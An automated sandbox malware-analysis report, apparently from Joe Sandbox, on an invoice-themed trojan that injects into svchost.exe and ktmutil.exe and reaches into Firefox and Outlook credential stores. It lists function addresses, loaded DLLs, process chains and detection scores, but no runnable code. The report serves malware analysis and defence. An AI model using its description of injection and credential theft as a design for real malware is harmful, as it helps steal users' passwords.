Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03370CB5	5_2_03370CB5
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_032C0CF2	5_2_032C0CF2
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_0338132D	5_2_0338132D
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_032BD34C	5_2_032BD34C
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_0331739A	5_2_0331739A
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_032D52A0	5_2_032D52A0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_033712ED	5_2_033712ED
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_032ED2F0	5_2_032ED2F0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_032EB2C0	5_2_032EB2C0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_0339B16B	5_2_0339B16B
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_032BF172	5_2_032BF172
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_0330516C	5_2_0330516C
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_032DB1B0	5_2_032DB1B0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_033870E9	5_2_033870E9
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_0338F0E0	5_2_0338F0E0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_032D70C0	5_2_032D70C0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_0337F0CC	5_2_0337F0CC
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_0338F7B0	5_2_0338F7B0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03315630	5_2_03315630
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_033816CC	5_2_033816CC
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03387571	5_2_03387571
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_0336D5B0	5_2_0336D5B0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_033995C3	5_2_033995C3
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_0338F43F	5_2_0338F43F
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_032C1460	5_2_032C1460
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_0338FB76	5_2_0338FB76
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_032EFB80	5_2_032EFB80
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03345BF0	5_2_03345BF0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_0330DBF9	5_2_0330DBF9
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03343A6C	5_2_03343A6C
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_0338FA49	5_2_0338FA49
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03387A46	5_2_03387A46
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03315AA0	5_2_03315AA0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03371AA3	5_2_03371AA3
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_0336DAAC	5_2_0336DAAC
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_0337DAC6	5_2_0337DAC6
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03365910	5_2_03365910
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_032D9950	5_2_032D9950
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_032EB950	5_2_032EB950
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_0333D800	5_2_0333D800
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_032D38E0	5_2_032D38E0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_0338FF09	5_2_0338FF09
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_0338FFB1	5_2_0338FFB1
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_032D1F92	5_2_032D1F92
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03293FD2	5_2_03293FD2
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03293FD5	5_2_03293FD5
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_032D9EB0	5_2_032D9EB0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03387D73	5_2_03387D73
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03381D5A	5_2_03381D5A
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_032D3D40	5_2_032D3D40
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_032EFDC0	5_2_032EFDC0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03349C32	5_2_03349C32
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_0338FCF2	5_2_0338FCF2
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_02A21FB0	5_2_02A21FB0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_02A1CEE7	5_2_02A1CEE7
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_02A1CEF0	5_2_02A1CEF0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_02A1B188	5_2_02A1B188
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_02A1B190	5_2_02A1B190
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_02A1D110	5_2_02A1D110
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_02A25610	5_2_02A25610
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_02A3BBC0	5_2_02A3BBC0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_02A23850	5_2_02A23850
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_0302E344	5_2_0302E344
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_0302E463	5_2_0302E463
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_0302CA9B	5_2_0302CA9B
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_0302E805	5_2_0302E805
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_0302D8C8	5_2_0302D8C8

Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: String function: 03305130 appears 58 times
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: String function: 032BB970 appears 262 times
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: String function: 0334F290 appears 103 times
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: String function: 03317E54 appears 107 times
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: String function: 0333EA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03AAEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03A2B970 appears 262 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03A87E54 appears 107 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03ABF290 appears 103 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03A75130 appears 58 times
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: String function: 00F86AC0 appears 42 times
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: String function: 00F7EC2F appears 68 times
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: String function: 00F8F8A0 appears 35 times

Source: PROFORMA INVOICE.exe, 00000000.00000003.1693330671.0000000004203000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs PROFORMA INVOICE.exe
Source: PROFORMA INVOICE.exe, 00000000.00000003.1692286212.00000000043AD000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs PROFORMA INVOICE.exe

Source: PROFORMA INVOICE.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@9/3@11/9

Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe

Code function: 0_2_00FACE7A GetLastError,FormatMessageW,

0_2_00FACE7A

Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00F9AB84 AdjustTokenPrivileges,CloseHandle,		0_2_00F9AB84
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00F9B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_00F9B134

Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe

Code function: 0_2_00FAE1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_00FAE1FD

Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe

Code function: 0_2_00FA6532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,

0_2_00FA6532

Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe

Code function: 0_2_00FBC18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,

0_2_00FBC18C

Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe

Code function: 0_2_00F6406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00F6406B

Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe

File created: C:\Users\user\AppData\Local\Temp\autBAAF.tmp

Jump to behavior

Source: PROFORMA INVOICE.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: ktmutil.exe, 00000005.00000002.3555301986.0000000002CB3000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000005.00000003.2150854974.0000000002CB3000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: PROFORMA INVOICE.exe	ReversingLabs: Detection: 36%
Source: PROFORMA INVOICE.exe	Virustotal: Detection: 24%

Source: unknown	Process created: C:\Users\user\Desktop\PROFORMA INVOICE.exe "C:\Users\user\Desktop\PROFORMA INVOICE.exe"
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PROFORMA INVOICE.exe"
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	Process created: C:\Windows\SysWOW64\srdelayed.exe "C:\Windows\SysWOW64\srdelayed.exe"
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	Process created: C:\Windows\SysWOW64\ktmutil.exe "C:\Windows\SysWOW64\ktmutil.exe"
Source: C:\Windows\SysWOW64\ktmutil.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PROFORMA INVOICE.exe"	Jump to behavior
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	Process created: C:\Windows\SysWOW64\srdelayed.exe "C:\Windows\SysWOW64\srdelayed.exe"	Jump to behavior
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	Process created: C:\Windows\SysWOW64\ktmutil.exe "C:\Windows\SysWOW64\ktmutil.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\ktmutil.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\ktmutil.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: PROFORMA INVOICE.exe

Static file information: File size 1216000 > 1048576

Source: PROFORMA INVOICE.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: PROFORMA INVOICE.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: PROFORMA INVOICE.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: PROFORMA INVOICE.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: PROFORMA INVOICE.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: PROFORMA INVOICE.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: PROFORMA INVOICE.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: qWxlULNrWdo.exe, 00000003.00000000.1883023571.000000000021E000.00000002.00000001.01000000.00000005.sdmp, qWxlULNrWdo.exe, 00000008.00000002.3555102909.000000000021E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: PROFORMA INVOICE.exe, 00000000.00000003.1693059816.0000000004280000.00000004.00001000.00020000.00000000.sdmp, PROFORMA INVOICE.exe, 00000000.00000003.1693330671.00000000040E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1958347966.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1865806917.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1958347966.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1864353262.0000000003600000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000005.00000002.3557184594.000000000342E000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000005.00000003.1968274121.0000000002F26000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000005.00000002.3557184594.0000000003290000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000005.00000003.1970558661.00000000030DB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: PROFORMA INVOICE.exe, 00000000.00000003.1693059816.0000000004280000.00000004.00001000.00020000.00000000.sdmp, PROFORMA INVOICE.exe, 00000000.00000003.1693330671.00000000040E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1958347966.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1865806917.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1958347966.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1864353262.0000000003600000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, ktmutil.exe, 00000005.00000002.3557184594.000000000342E000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000005.00000003.1968274121.0000000002F26000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000005.00000002.3557184594.0000000003290000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000005.00000003.1970558661.00000000030DB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ktmutil.pdbGCTL source: svchost.exe, 00000001.00000002.1958233127.0000000003419000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1958211552.0000000003400000.00000004.00000020.00020000.00000000.sdmp, qWxlULNrWdo.exe, 00000003.00000002.3556028830.0000000001348000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ktmutil.pdb source: svchost.exe, 00000001.00000002.1958233127.0000000003419000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1958211552.0000000003400000.00000004.00000020.00020000.00000000.sdmp, qWxlULNrWdo.exe, 00000003.00000002.3556028830.0000000001348000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: ktmutil.exe, 00000005.00000002.3557624704.00000000038BC000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000005.00000002.3555301986.0000000002C33000.00000004.00000020.00020000.00000000.sdmp, qWxlULNrWdo.exe, 00000008.00000000.2034763593.0000000002A6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2265030453.000000000616C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: ktmutil.exe, 00000005.00000002.3557624704.00000000038BC000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000005.00000002.3555301986.0000000002C33000.00000004.00000020.00020000.00000000.sdmp, qWxlULNrWdo.exe, 00000008.00000000.2034763593.0000000002A6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2265030453.000000000616C000.00000004.80000000.00040000.00000000.sdmp

Source: PROFORMA INVOICE.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: PROFORMA INVOICE.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: PROFORMA INVOICE.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: PROFORMA INVOICE.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: PROFORMA INVOICE.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe

Code function: 0_2_00F7E01E LoadLibraryA,GetProcAddress,

0_2_00F7E01E

Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00F8C09E push esi; ret	0_2_00F8C0A0
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00F8C187 push edi; ret	0_2_00F8C189
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00FCC8BC push esi; ret	0_2_00FCC8BE
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00F86B05 push ecx; ret	0_2_00F86B18
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00FAB2B1 push FFFFFF8Bh; iretd	0_2_00FAB2B3
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00F8BDAA push edi; ret	0_2_00F8BDAC
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00F8BEC3 push esi; ret	0_2_00F8BEC5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00416096 push eax; ret	1_2_004160E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004168B9 push 49A0F8CEh; ret	1_2_00416912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004160BB push eax; ret	1_2_004160E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00416970 push 49A0F8CEh; ret	1_2_00416912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0041692F push 49A0F8CEh; ret	1_2_00416912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004191FC push es; ret	1_2_00419202
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004049B6 push cs; iretd	1_2_004049BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004032E0 push eax; ret	1_2_004032E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00415A90 push ds; retf	1_2_00415A93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00411BB6 push ecx; retf	1_2_00411BB8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004065E5 push cs; ret	1_2_004065F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00404E33 push ds; iretd	1_2_00404E63
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040D6C1 push ebp; retf	1_2_0040D6CA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00404E91 push ds; iretd	1_2_00404E63
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A0225F pushad ; ret	1_2_03A027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A027FA pushad ; ret	1_2_03A027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A309AD push ecx; mov dword ptr [esp], ecx	1_2_03A309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A0283D push eax; iretd	1_2_03A02858
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A01366 push eax; iretd	1_2_03A01369
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	Code function: 3_2_0472646E push 49A0F8CEh; ret	3_2_04726410
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	Code function: 3_2_0472642D push 49A0F8CEh; ret	3_2_04726410
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	Code function: 3_2_047160E3 push cs; ret	3_2_047160EE
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	Code function: 3_2_047144B4 push cs; iretd	3_2_047144B8
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	Code function: 3_2_04714931 push ds; iretd	3_2_04714961

Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00FC8111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00FC8111
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00F7EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_00F7EB42

Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe

